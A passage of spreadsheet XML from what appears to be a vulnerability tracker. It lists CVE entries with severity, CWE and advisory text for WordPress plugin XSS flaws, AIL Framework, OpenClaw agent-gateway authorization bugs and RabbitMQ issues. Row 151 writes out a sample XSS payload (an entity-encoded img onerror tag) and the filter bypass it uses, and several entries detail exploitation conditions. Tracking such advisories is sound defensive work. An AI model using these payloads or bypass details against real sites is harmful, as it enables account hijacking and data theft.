      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'telegram' profile field in versions up to, and including, 3.1.6. This is due to insufficient input sanitization and output escaping in the profile_update action — the raw $_POST['data'] array is copied into a $custom_fields variable before validate() and sanitize() run, both of which operate only on a parallel $user reference, leaving $custom_fields unsanitized when it is persisted via update_custom_fields(); on render, wpforo_decode() reverses the entity encoding and the value is echoed without escaping in field_wrap_profile(). This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93747</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93897</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text-type Custom Field (e.g., 'phone') in all versions up to, and including, 2.8.181 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload must be stored in a text-type custom field (such as a phone field) via the AJAX geodir_save_post endpoint, using entity-encoded angle brackets (e.g., &amp;lt;img src=x onerror=alert(1)&amp;gt;) to bypass the strpos()-gated tag-stripping check.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93897</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94376</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via User Display Name in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable by Subscriber-level users because WordPress core's sanitize_text_field() preserves HTML-entity-encoded payloads (e.g., an iframe srcdoc attribute), allowing the encoded string to be stored as a display name without requiring the unfiltered_html capability, and the plugin subsequently decodes it server-side before rendering.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94376</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96766</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_hours' parameter in all versions up to, and including, 2.8.183 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the AJAX save handler validates only post authorship and a nonce with no additional capability check, allowing any subscriber-level user who owns a listing to exploit this vulnerability.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96766</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100177</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler task creation API (api_add_crawler_task) contained an insufficient authorization check when a user supplied a cookiejar UUID to attach to a one-shot or scheduled crawler task. The original code only verified that the cookiejar existed and, if its access level was 0, compared the cookiejar's owning user ID to the requesting user ID. It did not validate organizational boundaries, did not account for the requesting user's role. When the cookiejar level was not 0, no access check was performed at all. An authenticated user could therefore reference another organization's cookiejar by UUID and have the crawler use that organization's stored cookies (session tokens, authentication credentials) when performing web crawls, effectively leaking or exfiltrating the victim organization's session data.
The vulnerability requires an authenticated user with the ability to create crawler tasks. The attacker must know or guess a valid cookiejar UUID belonging to another organization. The impact is unauthorized access to another organization's stored cookies and session data through the crawler infrastructure.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100177</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100190</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler splash domain page (showDomain.html) is vulnerable to stored cross-site script injection (XSS). User-supplied data originating from imported crawler captures—specifically item IDs, URLs, and screenshot file paths—was interpolated directly into inline JavaScript contexts within the HTML template. This included an onclick attribute that embedded raw screenshot and URL values into a JavaScript function call, and an inline script block that assigned a screenshot value to a JavaScript variable without escaping. An attacker with a user-role API client could craft a malicious crawler capture import containing JavaScript payloads in these fields. When any user (including privileged users) subsequently viewed the affected domain page, the injected script would execute in the victim's browser context, potentially allowing session hijacking, data exfiltration, or unauthorized actions on behalf of the victim. The vulnerability is stored in the application's data layer and triggered upon page rendering, requiring no further interaction beyond loading the domain view.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100190</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100556</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) versions &gt;= 2026.5.2 and &lt; 2026.8.1 contain an incorrect authorization vulnerability in WhatsApp group handling. A group sender who is admitted for ordinary messages but denied by commands.allowFrom or owner command authorization can issue the /new &lt;model&gt; command to reset the shared group session and persist a provider and model override. This allows a command-denied group member to select a provider and model already permitted by the operator for subsequent turns in the shared group session, potentially changing provider routing, cost, data flow, or availability. It does not allow adding a new provider or host command execution. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100556</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100577</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to validate video asset URLs returned by providers, allowing server-side requests to private destinations. A malicious or compromised provider can return private or loopback URLs to cause the CLI to make requests to internal services accessible from the OpenClaw host.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100577</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100591</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed agent gateway. In versions before 2026.7.1, the global Active Memory toggle mutations could omit owner checks. An authorized non-owner external-channel sender could therefore persistently enable or disable Active Memory for the Gateway, disabling memory recall for future sessions or re-enabling global recall where the owner expected it to remain disabled. The issue is limited to persistent global on/off mutations; session-level controls and read-only status remain governed by existing command policy. The issue is fixed in version 2026.7.1. (Suggested title: "OpenClaw before 2026.7.1 missing owner authorization check on Active Memory global toggles".)</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100591</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100592</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>npm, go</t>
        </is>
      </c>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed via npm. In versions &gt;= 2026.4.10 and &lt; 2026.7.1, persistent memory dreaming mutations omit owner permission checks. An authorized but non-owner external-channel sender can issue the persistent '/dreaming on' and '/dreaming off' commands to enable or disable the Gateway's Memory Core dreaming behavior, disabling background memory processing or re-enabling durable memory promotion where the owner expected it to remain disabled; the practical confidentiality, integrity, and availability impact depends on stored conversation material and subsequent memory use. Read-only status and help commands remain governed by normal command policy. The issue is fixed in version 2026.7.1. As a workaround, disable dreaming commands in external channels or restrict channel command access to owners.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100592</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61837</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, AMQP 1.0 management GET /bindings exposes full binding topology to any authenticated AMQP user without resource/management permission checks. the AMQP 1.0 HTTP-over-AMQP management endpoint GET /bindings (the rabbitamqpmanagement handler) enumerates bindings between an arbitrary source exchange and destination queue/exchange in the caller's virtual host without performing any resource-level permission check. Unlike every sibling operation in the same module (which call checkresourceaccess / bindingchecks), the GET handler ignores the authenticated User and returns the binding list unchanged. As a result, any authenticated AMQP 1.0 client that can open a management link pair , including users with no management/monitoring/policymaker/administrator tag , can enumerate the complete binding topology (source exchanges, destination queues/exchanges, routing keys, and binding arguments) of the virtual host they can access. The equivalent HTTP management API (GET /api/bindings) Confidentiality impact: a non-management AMQP 1.0 user can enumerate the complete routing topology of any virtual host it can connect to , every (source exchange, destination queue/exchange, routing key, binding arguments) This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61837</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67223</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. The advisory establishes affected 3.13, 4.0, 4.1, 4.2, and 4.3 maintenance lines but contains conflicting first-fixed versions for the 3.13, 4.0, and 4.1 lines. fill/2 substitutes ${username} into user_dn_pattern without RFC 4514 DN escaping, allowing a crafted username to alter the LDAP bind DN and potentially select a different directory entry. Exploitation requires rabbitmq_auth_backend_ldap with a user_dn_pattern containing ${username}, a directory layout in which the injected suffix resolves usefully, and a password valid for the resulting DN. The advisory body identifies 3.13.15, 4.0.20, 4.1.11, 4.2.9, and 4.3.3 as fixed, while structured metadata identifies 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3. No fixed-version assertion is certifiable until a curator resolves this conflict.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67223</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67225</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the stream protocol stored the FrameMax value negotiated during the Tune handshake but did not compare it with an inbound frame's declared length before buffering the frame. With the stream plugin enabled, a remote client could therefore cause excessive memory pressure and denial of service by declaring an oversized frame. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67225</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67230</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, the Web STOMP WebSocket handler enforced neither max_frame_size nor login_timeout before authentication, allowing an unauthenticated client to keep a connection alive with a slow stream of small frames and accumulate unbounded pre-authentication state. The rabbitmq_web_stomp plugin must be enabled, and no authentication is required to reach the vulnerable path. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67230</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
